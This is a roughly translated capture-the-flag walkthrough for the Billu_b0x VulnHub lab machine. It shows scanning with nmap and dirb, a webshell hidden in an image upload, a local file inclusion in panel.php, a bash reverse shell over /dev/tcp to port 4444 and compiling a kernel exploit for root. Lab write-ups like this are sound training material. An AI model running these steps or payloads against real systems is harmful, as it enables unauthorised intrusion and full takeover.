Real test
NET host mode
for experimental purposes: to get root privileges (prompt start from the web application)
Project location: https://www.vulnhub.com/entry/billu-b0x,188/
Host found
1
|
root@kali:~# arp-scan -l
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
|
root@kali:~# nmap -T4 -A -v 192.168.67.138 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 fa:cf:a2:52:c4:fa:f5:75:a7:e2:bd:60:83:3e:7b:de (DSA) | 2048 88:31:0c:78:98:80:ef:33:fa:26:22:ed:d0:9b:ba:f8 (RSA) |_ 256 0e:5e:33:03:50:c9:1e:b3:e7:51:39:a4:4a:10:64:ca (ECDSA) 80/tcp open http Apache httpd 2.2.22 ((Ubuntu)) | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set | http-methods: |_ Supported Methods: OPTIONS GET HEAD POST |_http-server-header: Apache/2.2.22 (Ubuntu) |_http-title: --==[[IndiShell Lab]]==--
|
Get Permissions
Tip using sql injection, the first time think of post injection (technology, however), but to no avail
blasting directory
1
|
root @ kali: ~ # dirb http://192.168.67.138 /usr/share/dirb/wordlists/big.txt
|
1 2 3
|
http://192.168.67.138/add # file upload no echo http://192.168.67.138/in #phpinfo http://192.168.67.138/test # prompt file contains
|
Download Source
get request to no avail, post requests
passwd, ica
and root
can log ssh
download c.php find mysql account password
Login http://192.168.67.138
discovered a new upload point
check the file contents can not be achieved renamed, upload pictures horse
1
|
copy 1.jpg/b+1.php 2.jpg
|
Into the http://192.168.67.138/uploaded_images/
analysis panel.php
found that the file contains
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21
|
if(isset($_POST['continue'])) { $dir=getcwd(); $choice=str_replace('./','',$_POST['load']); if($choice==='add') { include($dir.'/'.$choice.'.php'); die(); } if($choice==='show') { include($dir.'/'.$choice.'.php'); die(); } else { include($dir.'/'.$_POST['load']); }
|
Rebound shell
URL encoding
1
|
echo "bash -i >& /dev/tcp/192.168.67.1/4444 0>&1" | bash
|
1 2
|
www Data @ indishell: / var / www $ id` uid = 33 (WWW data) gid = 33 (www) data groups = 33 (WWW data)
|
Put right
1 2
|
Check kernel version uname -a # cat / etc / issue # Display system version
|
Use local privilege escalation exp
downloaded to the local
1 2
|
chmod 777 37292.c # empower gcc 37292.c -o test # compiler
|
carried out
1
|
www-data @ indishell: / tmp $ ./test
|
It ends here
If wrong, please contact [email protected]
Original: Large column for Billu_b0x test